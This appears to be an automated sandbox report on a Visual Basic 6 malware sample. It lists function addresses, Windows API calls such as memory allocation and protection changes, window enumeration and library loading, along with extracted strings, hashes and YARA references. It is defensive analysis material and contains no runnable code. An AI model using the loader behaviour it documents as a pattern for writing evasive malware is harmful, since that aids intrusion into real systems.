Source File: 00000000.00000002.928545943.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false

Yara matches

Similarity

API ID:
String ID: %Ge$-{=V$>#>Z$>#>Z$dg$rfR
API String ID: 0-910247625
Opcode ID: 73944edf4070b29d0ccc62da43456410098141f66e0272ddda44d3f8cacfba49
Instruction ID: 5743c1d0c714d6f1e34d5047c3312d290bd2c3e5f4c2741bc02ec1bbc9ba3021
Opcode Fuzzy Hash: 73944edf4070b29d0ccc62da43456410098141f66e0272ddda44d3f8cacfba49
Instruction Fuzzy Hash: 42822F7160834A9FDB34AE38CC957EA7BB2FF55304F95816EDC898B251D3309A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02B8C81A, Relevance: 13.2, APIs: 1, Strings: 6, Instructions: 935COMMON

Download Yara Rule

Strings

>#>Z, xrefs: 02B885B4
-{=V, xrefs: 02B882C0
>#>Z, xrefs: 02B885AF
dg, xrefs: 02B87C7F
%Ge, xrefs: 02B87F1D
rfR, xrefs: 02B88495

Memory Dump Source

Source File: 00000000.00000002.928545943.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false

Yara matches

Similarity

API ID:
String ID: %Ge$-{=V$>#>Z$>#>Z$dg$rfR
API String ID: 0-910247625
Opcode ID: 0023af6cda9dab4cd9e5116952c40ceead178b9854856b762c59fe780e5599d0
Instruction ID: 0dbf18d5905cee8031e78c57ba3d29ab5b38cdff42a762d9d124f1f4d84d9764
Opcode Fuzzy Hash: 0023af6cda9dab4cd9e5116952c40ceead178b9854856b762c59fe780e5599d0
Instruction Fuzzy Hash: C382307560434A9FDB34AE38CD953EA7BB2FF55350F95822EDC898B254D3308A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02B8B801, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 142libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(CC855ADB), ref: 02B8B4F0

Strings

:),q, xrefs: 02B8B8A1
ed[, xrefs: 02B8B349
Qh50, xrefs: 02B8B8EA

Memory Dump Source

Source File: 00000000.00000002.928545943.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: :),q$Qh50$ed[
API String ID: 1029625771-72561622
Opcode ID: 465cde3246d316509bf79a49fc2e2e132e34f986e8fee50cc6b245f3d8807bc0
Instruction ID: ffe4ac4e84dc8c364cadfef4a2f009bc42dec873736f46eae2b375bceeadcb16
Opcode Fuzzy Hash: 465cde3246d316509bf79a49fc2e2e132e34f986e8fee50cc6b245f3d8807bc0
Instruction Fuzzy Hash: 24412176504259CFCF347E7899263EA36A3EF523A4F48406ADC8D8B184D7328582CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02B89180, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 240memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02B8B2EB: LoadLibraryA.KERNELBASE(CC855ADB), ref: 02B8B4F0

NtAllocateVirtualMemory.NTDLL ref: 02B893BE

Strings

ed[, xrefs: 02B8B349

Memory Dump Source

Source File: 00000000.00000002.928545943.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: ed[
API String ID: 2616484454-2557161058
Opcode ID: 3c96655b5d6e0934570fb73df1fc134dc880d6245e480c06373c320b9f547fc4
Instruction ID: 10d52d85c33bde5b6b9bba20d8007494126606659108bdf2d77bdd3c0dc7de31
Opcode Fuzzy Hash: 3c96655b5d6e0934570fb73df1fc134dc880d6245e480c06373c320b9f547fc4
Instruction Fuzzy Hash: BB911F72608749CFCF30AE788D557EA37A2EF96360F48462ADC899B250D7318681CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02B8DCB9, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 296COMMON

Download Yara Rule

Strings

n, xrefs: 02B8DCD9

Memory Dump Source

Source File: 00000000.00000002.928545943.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false

Yara matches

Similarity

API ID:
String ID: n
API String ID: 0-2013832146
Opcode ID: fdee1dbde7e2baebe880b38335eb341f628c7e3791694ea80a210375dcbf64bb
Instruction ID: 34b5f20f026237e27c34b7cc8dab02c50eb0574792be43dae075a487e010265f
Opcode Fuzzy Hash: fdee1dbde7e2baebe880b38335eb341f628c7e3791694ea80a210375dcbf64bb
Instruction Fuzzy Hash: 9CB1357160434ACFCF35AE38C9A47EA77A2EF95310F50429ADC8A8B680D7349982CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02B88E84, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,EE725934), ref: 02B88FDC

Strings

4Yr, xrefs: 02B88F7B

Memory Dump Source

Source File: 00000000.00000002.928545943.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: 4Yr
API String ID: 823142352-2922367854
Opcode ID: 1023334e7045d2e1340de8ab5819cbe0de42905205db4e40899d5ee1db1a8c51
Instruction ID: f240bdf67413854c6f20262737942c58c38d5f64dc519d771ce30bded283160f
Opcode Fuzzy Hash: 1023334e7045d2e1340de8ab5819cbe0de42905205db4e40899d5ee1db1a8c51
Instruction Fuzzy Hash: 05213434608389CFDB68AE3589857BFB3E7EF81790F42892DDCCA86154D7308885CB02

Uniqueness

Uniqueness Score: -1.00%

Function 02B80BAF, Relevance: 1.7, APIs: 1, Instructions: 170COMMON

Download Yara Rule

APIs

EnumWindows.USER32(026AB581), ref: 02B80BDF

Memory Dump Source

Source File: 00000000.00000002.928545943.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: f73385b6c8fb0a5b7a79ee60c6114e9e5a458b1b7251c05a8184cb1284a2f7d2
Instruction ID: 454fb01e07dbf847a33aea7b51a9bf57252b7278233ef3c0a0e554f87c440190
Opcode Fuzzy Hash: f73385b6c8fb0a5b7a79ee60c6114e9e5a458b1b7251c05a8184cb1284a2f7d2
Instruction Fuzzy Hash: 504198775142889FC716EF74C8D56C6BBA5EF56264F244CCEC8A48F602E231E44ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 02B890B9, Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.928545943.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d50ccbfc27dc3acfc77a959d45af4ede9c23ea5e13f4b69537df234cad70634d
Instruction ID: a1cebdd2cdfb4010b0c38d4c2bc518b4f256b3ea33d081dfe4b99d72ea96258e
Opcode Fuzzy Hash: d50ccbfc27dc3acfc77a959d45af4ede9c23ea5e13f4b69537df234cad70634d
Instruction Fuzzy Hash: 80F04CFB50C2C84FCB05BE2494553E87F21BB93714F5884CAC84946192D72595D5CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 02B8D75C, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 02B8D80D

Memory Dump Source

Source File: 00000000.00000002.928545943.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: c97a727f72159cb96fa35af8ecdf182bb09a5effe1a98c55ad22ac30e521871d
Instruction ID: 1c5b93ebb9481fbf8377931aa9b244502d820001dbe735d1ac44a8d10e0a7280
Opcode Fuzzy Hash: c97a727f72159cb96fa35af8ecdf182bb09a5effe1a98c55ad22ac30e521871d
Instruction Fuzzy Hash: C801AD716083898FDB388E68CD98BEEB7AAFFC9300F45812EED598B349C7715905C615

Uniqueness

Uniqueness Score: -1.00%

Function 00429D50, Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 229COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00401CE8,0042E010), ref: 00429DD2
__vbaObjSet.MSVBVM60(?,00000000), ref: 00429DEB
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004028A4,000001D0), ref: 00429E7B
__vbaFreeObj.MSVBVM60 ref: 00429E88
__vbaHresultCheckObj.MSVBVM60(00000000,004011B8,004025F0,0000070C), ref: 00429EA7
__vbaNew2.MSVBVM60(00401CE8,0042E010), ref: 00429EF8
__vbaObjSet.MSVBVM60(?,00000000), ref: 00429F11
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004028B4,00000140), ref: 00429F38
__vbaStrCopy.MSVBVM60 ref: 00429F48
__vbaHresultCheckObj.MSVBVM60(00000000,004011B8,004025F0,00000710), ref: 00429F7B
__vbaFreeStr.MSVBVM60 ref: 00429F80
__vbaFreeObj.MSVBVM60 ref: 00429F89
__vbaHresultCheckObj.MSVBVM60(00000000,004011B8,004025F0,00000714), ref: 00429FB2
__vbaHresultCheckObj.MSVBVM60(00000000,004011B8,004025C0,000002B4), ref: 00429FCF
__vbaVarAdd.MSVBVM60(?,?,?), ref: 00429FFD
__vbaVarMove.MSVBVM60 ref: 0042A004
__vbaVarTstLt.MSVBVM60(00000003,?), ref: 0042A01C

Strings

EFFEKTOMRAADE, xrefs: 00429F3D

Memory Dump Source

Source File: 00000000.00000002.927202138.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.927189268.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.927326965.000000000042E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927338224.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$New2$CopyMove
String ID: EFFEKTOMRAADE
API String ID: 1189797636-944271036
Opcode ID: 8f0ccc4f3956865ec07d108e216b80e1f0c9cbb02bd9c34e52256efaa2ef10ef
Instruction ID: 0521e018a37e582ffcddff783b538ac9201385d993c73416fee0bf2dc4e7f2ce
Opcode Fuzzy Hash: 8f0ccc4f3956865ec07d108e216b80e1f0c9cbb02bd9c34e52256efaa2ef10ef
Instruction Fuzzy Hash: 76914C70A00215ABDB10DFA9DD84E9EBBB8FF48704F10816EF409EB291D7749945CF68

Uniqueness

Uniqueness Score: -1.00%

Function 02B8AF1C, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 170COMMON

Download Yara Rule

Strings

ed[, xrefs: 02B8B349

Memory Dump Source

Source File: 00000000.00000002.928545943.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false

Yara matches

Similarity

API ID:
String ID: ed[
API String ID: 0-2557161058
Opcode ID: 325db8ce718bbbb20e68d0244c104bbf733913913e2558250edea3f4c0f54a26
Instruction ID: 7ba78ac2df1e2191dcf849b71e014aaeb8d53c6ecae994bcbb482e598cecdde2
Opcode Fuzzy Hash: 325db8ce718bbbb20e68d0244c104bbf733913913e2558250edea3f4c0f54a26
Instruction Fuzzy Hash: 575103726042499FCF30BE7888597EA37A3FF55724F89416ADC8DDB650D3318981CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02B8B2EB, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(CC855ADB), ref: 02B8B4F0

Strings

ed[, xrefs: 02B8B349

Memory Dump Source

Source File: 00000000.00000002.928545943.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: ed[
API String ID: 1029625771-2557161058
Opcode ID: 3926b506290036627b708843efe696cc7eb5e9d845d464a55843e89b13b00fd9
Instruction ID: a237217e2e511d7fd7227cfce0e8dda46ea7edc7611dc42b7ffe3ceecdd92b3a
Opcode Fuzzy Hash: 3926b506290036627b708843efe696cc7eb5e9d845d464a55843e89b13b00fd9
Instruction Fuzzy Hash: 5721EF76204249DFCF30AEB999167EA36A2EFA1324F88412BDC5DDB554D7318982CB41

Uniqueness

Uniqueness Score: -1.00%

Function 004013F0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 004013F5

Strings

VB5!6&*, xrefs: 004013F0

Memory Dump Source

Source File: 00000000.00000002.927202138.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.927189268.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.927326965.000000000042E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927338224.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: af8348731631672e548c74f30288efc61e85f31d6f3a208aa4a4602521c92c78
Instruction ID: 9fc2610f7d50abf553d3e2fac6568a0bff729737b55b8982cf583302643519d9
Opcode Fuzzy Hash: af8348731631672e548c74f30288efc61e85f31d6f3a208aa4a4602521c92c78
Instruction Fuzzy Hash: 1F11F96140E7C55FC70726714C661927FB48E1B25030A00D7D885DA4B3D15C1C4ACB73

Uniqueness

Uniqueness Score: -1.00%

Function 02B895B7, Relevance: 1.5, APIs: 1, Instructions: 42libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02B8A193

Memory Dump Source

Source File: 00000000.00000002.928545943.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ca434c31524e85de386d77fe6f9099c5239673cfd911df6f075424cde2a71909
Instruction ID: 86c9628088e00006ef4b5240cae4a74a721ce4eb7829eaab4ab3b29806d382f5
Opcode Fuzzy Hash: ca434c31524e85de386d77fe6f9099c5239673cfd911df6f075424cde2a71909
Instruction Fuzzy Hash: 86F04C5830074647CA18B93C85B03EB02039F93250F14826EFC975B1C5CF21D887E785

Uniqueness

Uniqueness Score: -1.00%

Function 02B80C0A, Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

EnumWindows.USER32(026AB581), ref: 02B80BDF

Memory Dump Source

Source File: 00000000.00000002.928545943.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: dbc8adeb4b8496d532ddaf72ce511e27e9dfa5170b25d70eb7e6806947a37060
Instruction ID: e081d746186ba785c91b01ac5efc378bfe5475790665b731501d5317938cc62d
Opcode Fuzzy Hash: dbc8adeb4b8496d532ddaf72ce511e27e9dfa5170b25d70eb7e6806947a37060
Instruction Fuzzy Hash: 0BF0273650C3C45FC3125FB56CBC6CA7F24DF6A25871908EBC0848F193C1128C89CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02B82962, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(54DD249A,-0000000273F1D496), ref: 02B88CA7

Memory Dump Source

Source File: 00000000.00000002.928545943.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 16d6fe8bdcf9421215dbc28202db8ce64e1a83bb67aa4851b7c76b99611b1d08
Instruction ID: 86ea245a9cff0b2ed1f5421981ea07d2df738e78123cfd15b5bbf0cd6daefcc6
Opcode Fuzzy Hash: 16d6fe8bdcf9421215dbc28202db8ce64e1a83bb67aa4851b7c76b99611b1d08
Instruction Fuzzy Hash: 97E0E5306973098BD7246E34CA8239F76A29FC01D4F85855D8C8A85299D7329249CE02

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02B8C8CE, Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.928545943.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04046c0441d587779d3d22682230cb5c37b936be91214803c21969aa83fb9f6d
Instruction ID: f9e67043d8b481e513127bb5842f34faf4c1e8b5db44627ad234a134a6e293ce
Opcode Fuzzy Hash: 04046c0441d587779d3d22682230cb5c37b936be91214803c21969aa83fb9f6d
Instruction Fuzzy Hash: 9E1106B1110349CBCB3C6EA4DCB87FA36A1AF8A700F90016FDD8B97254DB315985CA15

Uniqueness

Uniqueness Score: -1.00%

Function 02B8B950, Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.928545943.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 672e6966e0ab4aeb0374a6102d33ea03cc852d308c70ca9b44181d47c1e68041
Instruction ID: 30d20d7fb81afbd0da95e768b2c7c23ea56cc3e0e9570f2f1e16a55e90abfabf
Opcode Fuzzy Hash: 672e6966e0ab4aeb0374a6102d33ea03cc852d308c70ca9b44181d47c1e68041
Instruction Fuzzy Hash: 37019625A5435A8FCB70AE74C0D03DB23A2EF27708F910166DD9DD7259E3318586CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02B8BAC8, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.928545943.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cf7bcd9ff11e81a35c1cd93ffc104d336ef328178a37fd8e840f98c5ac89941
Instruction ID: b0aa5071ecd17a8d2b13ec51cad21d0adff43485fcc53494e8232bc3196564aa
Opcode Fuzzy Hash: 3cf7bcd9ff11e81a35c1cd93ffc104d336ef328178a37fd8e840f98c5ac89941
Instruction Fuzzy Hash: 4C115B727002468FCB24EE28C984BD973E2EFA83A4F5984669C5CCB265C734E942CA15

Uniqueness

Uniqueness Score: -1.00%

Function 02B88CB6, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.928545943.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 685bf17cba13cdc17d83a7f0903fb11f00c91212c2258d51eabfff387efabb32
Instruction ID: 95368d2a4e7c4cf7acf1102bb16873a6d69db542424efa7ec0e2666e9a484bfe
Opcode Fuzzy Hash: 685bf17cba13cdc17d83a7f0903fb11f00c91212c2258d51eabfff387efabb32
Instruction Fuzzy Hash: 88C092B33005808FEB06CF18C682B4073A6FF12AC8F450494E402CF612C325ED04CA00

Uniqueness

Uniqueness Score: -1.00%

Function 02B8B2B7, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.928545943.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fb152cf7438c1d52ed61a43ce3a5de5eaf1dbdc4c7fe17d0640c0122ed56ac5
Instruction ID: 3812e5bcb7ba990c80137371896efe9f71bcdf667b3518318dc106a03d4cfbe4
Opcode Fuzzy Hash: 1fb152cf7438c1d52ed61a43ce3a5de5eaf1dbdc4c7fe17d0640c0122ed56ac5
Instruction Fuzzy Hash: 99B09234314B40CFC291CE2ECA80F8073E4BB05A60F814694A821C7AA5D768E8008A00

Uniqueness

Uniqueness Score: -1.00%

Function 004238E0, Relevance: 84.3, APIs: 44, Strings: 4, Instructions: 317COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 00423950
#539.MSVBVM60(?,00000001,00000001,00000001), ref: 00423960
__vbaStrVarMove.MSVBVM60(?), ref: 0042396A
__vbaStrMove.MSVBVM60 ref: 00423975
__vbaFreeVar.MSVBVM60 ref: 0042397E
__vbaVarDup.MSVBVM60 ref: 00423998
#520.MSVBVM60(?,?), ref: 004239A6
__vbaVarTstNe.MSVBVM60(?,?), ref: 004239C8
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 004239DB
__vbaNew2.MSVBVM60(0040280C,0042E3A4), ref: 004239FF
__vbaHresultCheckObj.MSVBVM60(00000000,02BBEA7C,004027FC,00000014), ref: 00423A2A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040281C,000000F0), ref: 00423A58
__vbaStrMove.MSVBVM60 ref: 00423A63
__vbaFreeObj.MSVBVM60 ref: 00423A6C
__vbaNew2.MSVBVM60(00401CE8,0042E010), ref: 00423A85
__vbaObjSet.MSVBVM60(?,00000000), ref: 00423A9E
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040282C,00000110), ref: 00423AC5
#667.MSVBVM60(?), ref: 00423ADB
__vbaStrMove.MSVBVM60 ref: 00423AE6
__vbaFreeObj.MSVBVM60 ref: 00423AEF
__vbaFreeVar.MSVBVM60 ref: 00423AF8
__vbaVarDup.MSVBVM60 ref: 00423B1A
#542.MSVBVM60(?,?), ref: 00423B28
__vbaVarTstNe.MSVBVM60(00008008,?), ref: 00423B4A
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00423B5D
__vbaNew2.MSVBVM60(0040280C,0042E3A4), ref: 00423B81
__vbaHresultCheckObj.MSVBVM60(00000000,02BBEA7C,004027FC,0000004C), ref: 00423BA6
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402854,00000028), ref: 00423BC2
__vbaFreeObj.MSVBVM60 ref: 00423BC7
__vbaNew2.MSVBVM60(0040280C,0042E3A4), ref: 00423BDF
__vbaHresultCheckObj.MSVBVM60(00000000,02BBEA7C,004027FC,00000014), ref: 00423C04
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040281C,000000E8), ref: 00423C2A
__vbaStrMove.MSVBVM60 ref: 00423C35
__vbaFreeObj.MSVBVM60 ref: 00423C3E
__vbaInStr.MSVBVM60(00000000,Prerecited,CHOGAK,FFF7134E), ref: 00423C54
__vbaNew2.MSVBVM60(00401CE8,0042E010), ref: 00423C6D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00423C86
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00402894,00000060), ref: 00423CAA
__vbaFreeObj.MSVBVM60 ref: 00423CB8
__vbaFreeStr.MSVBVM60(00423D10), ref: 00423CF9
__vbaFreeStr.MSVBVM60 ref: 00423CFE
__vbaFreeStr.MSVBVM60 ref: 00423D03
__vbaFreeStr.MSVBVM60 ref: 00423D08
__vbaFreeStr.MSVBVM60 ref: 00423D0D

Strings

rr, xrefs: 0042398A
CHOGAK, xrefs: 00423C49
11-11-11, xrefs: 00423B0C
Prerecited, xrefs: 00423C4E

Memory Dump Source

Source File: 00000000.00000002.927202138.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.927189268.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.927326965.000000000042E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927338224.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$MoveNew2$List$#520#539#542#667Copy
String ID: rr$11-11-11$CHOGAK$Prerecited
API String ID: 3147218522-3579901839
Opcode ID: 1b9ecb76a1807623b42f9f72d6b6bc80db03ad3dc8df28fa48ef4e28ac63fba8
Instruction ID: a6daf54bf61638ca3389e0660438ac5dae6c8547c1036dd7c75f66d1cb0c28a2
Opcode Fuzzy Hash: 1b9ecb76a1807623b42f9f72d6b6bc80db03ad3dc8df28fa48ef4e28ac63fba8
Instruction Fuzzy Hash: 0DC12A71A00219AFCB14DF94ED88EDDBBB8FF48705F10852AF541B72A0DB785586CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00429030, Relevance: 63.2, APIs: 33, Strings: 3, Instructions: 217COMMON

Download Yara Rule

APIs

__vbaStrCmp.MSVBVM60(00402908,00402908), ref: 0042908F
__vbaNew2.MSVBVM60(0040280C,0042E3A4), ref: 004290AF
__vbaHresultCheckObj.MSVBVM60(00000000,02BBEA7C,004027FC,00000014), ref: 004290D4
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040281C,00000108), ref: 00429101
__vbaFreeObj.MSVBVM60 ref: 0042910A
#536.MSVBVM60(?), ref: 0042911F
__vbaStrMove.MSVBVM60 ref: 0042912A
__vbaFreeVar.MSVBVM60 ref: 00429139
__vbaNew2.MSVBVM60(00401CE8,0042E010), ref: 0042914E
__vbaObjSet.MSVBVM60(?,00000000), ref: 00429167
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004028B4,00000150), ref: 0042918E
#666.MSVBVM60(?,?), ref: 004291AC
__vbaVarMove.MSVBVM60 ref: 004291B8
__vbaFreeObj.MSVBVM60 ref: 004291C1
__vbaFreeVar.MSVBVM60 ref: 004291CA
__vbaVarDup.MSVBVM60 ref: 004291E8
#528.MSVBVM60(?,?), ref: 004291F6
__vbaVarTstNe.MSVBVM60(?,?), ref: 0042921B
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0042922E
#539.MSVBVM60(?,00000001,00000001,00000001), ref: 0042924A
__vbaStrVarMove.MSVBVM60(?), ref: 00429254
__vbaStrMove.MSVBVM60 ref: 0042925F
__vbaFreeVar.MSVBVM60 ref: 00429268
__vbaNew2.MSVBVM60(00401CE8,0042E010), ref: 0042927D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00429296
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004028B4,00000048), ref: 004292B7
#690.MSVBVM60(Iterationen,HAMPERER,Forskningsinstitutions8,?), ref: 004292D0
__vbaFreeStr.MSVBVM60 ref: 004292D9
__vbaFreeObj.MSVBVM60 ref: 004292E2
#568.MSVBVM60(000000B0), ref: 004292ED
__vbaFreeStr.MSVBVM60(0042934C), ref: 0042933B
__vbaFreeVar.MSVBVM60 ref: 00429340
__vbaFreeStr.MSVBVM60 ref: 00429349

Strings

Forskningsinstitutions8, xrefs: 004292C1
Iterationen, xrefs: 004292CB
HAMPERER, xrefs: 004292C6

Memory Dump Source

Source File: 00000000.00000002.927202138.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.927189268.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.927326965.000000000042E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927338224.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$New2$#528#536#539#568#666#690List
String ID: Forskningsinstitutions8$HAMPERER$Iterationen
API String ID: 1863211896-2655439197
Opcode ID: 3ae94239b510dff3890ac9b252cf68a353a1cdfefc15d36f78882189cd1ff8f4
Instruction ID: 0d7b0a92b84b82dcec21aecf0f99f9c738b0bbef06ca68486c3fe835e01dee6b
Opcode Fuzzy Hash: 3ae94239b510dff3890ac9b252cf68a353a1cdfefc15d36f78882189cd1ff8f4
Instruction Fuzzy Hash: 92915970A00229AFCB14DFA4ED88AAEBBB4FF08305F10452AF545B72A0DBB45945CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00429370, Relevance: 58.0, APIs: 29, Strings: 4, Instructions: 278COMMON

Download Yara Rule

APIs

#680.MSVBVM60(00000000,3FF00000,00000000,3FF00000,00000000,40490000,?,?,?), ref: 004293EA
__vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 00429400
__vbaNew2.MSVBVM60(0040280C,0042E3A4), ref: 0042941C
__vbaHresultCheckObj.MSVBVM60(00000000,02BBEA7C,004027FC,00000014), ref: 00429447
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040281C,00000070), ref: 00429472
__vbaFreeObj.MSVBVM60 ref: 00429477
__vbaNew2.MSVBVM60(0040280C,0042E3A4), ref: 0042948F
__vbaHresultCheckObj.MSVBVM60(00000000,02BBEA7C,004027FC,00000014), ref: 004294B4
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040281C,00000070), ref: 004294D7
__vbaFreeObj.MSVBVM60 ref: 004294DC
#651.MSVBVM60(?), ref: 004294F4
__vbaStrMove.MSVBVM60 ref: 00429505
__vbaStrCmp.MSVBVM60(Out of string space,00000000), ref: 0042950D
__vbaFreeStr.MSVBVM60 ref: 00429520
__vbaFreeVar.MSVBVM60 ref: 00429529
__vbaNew2.MSVBVM60(0040280C,0042E3A4), ref: 0042954B
__vbaHresultCheckObj.MSVBVM60(00000000,02BBEA7C,004027FC,00000014), ref: 00429570
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040281C,000000D0), ref: 00429596
__vbaStrMove.MSVBVM60 ref: 004295A5
__vbaFreeObj.MSVBVM60 ref: 004295AA
__vbaNew2.MSVBVM60(0040280C,0042E3A4), ref: 004295C3
__vbaHresultCheckObj.MSVBVM60(00000000,02BBEA7C,004027FC,00000014), ref: 004295E8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040281C,00000060), ref: 00429608
__vbaStrMove.MSVBVM60 ref: 00429617
__vbaFreeObj.MSVBVM60 ref: 0042961C
__vbaEnd.MSVBVM60 ref: 00429622
__vbaLateMemCall.MSVBVM60(?,R6uEaLZZXnxq88,00000003), ref: 0042969D
__vbaFreeStr.MSVBVM60(004296F0), ref: 004296E8
__vbaFreeStr.MSVBVM60 ref: 004296ED

Strings

Out of string space, xrefs: 00429508
Behovsundersgelsernes, xrefs: 0042965B
R6uEaLZZXnxq88, xrefs: 00429697
$$, xrefs: 004296A7

Memory Dump Source

Source File: 00000000.00000002.927202138.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.927189268.0000000000400000.00000002.00020000.sdmp Download File
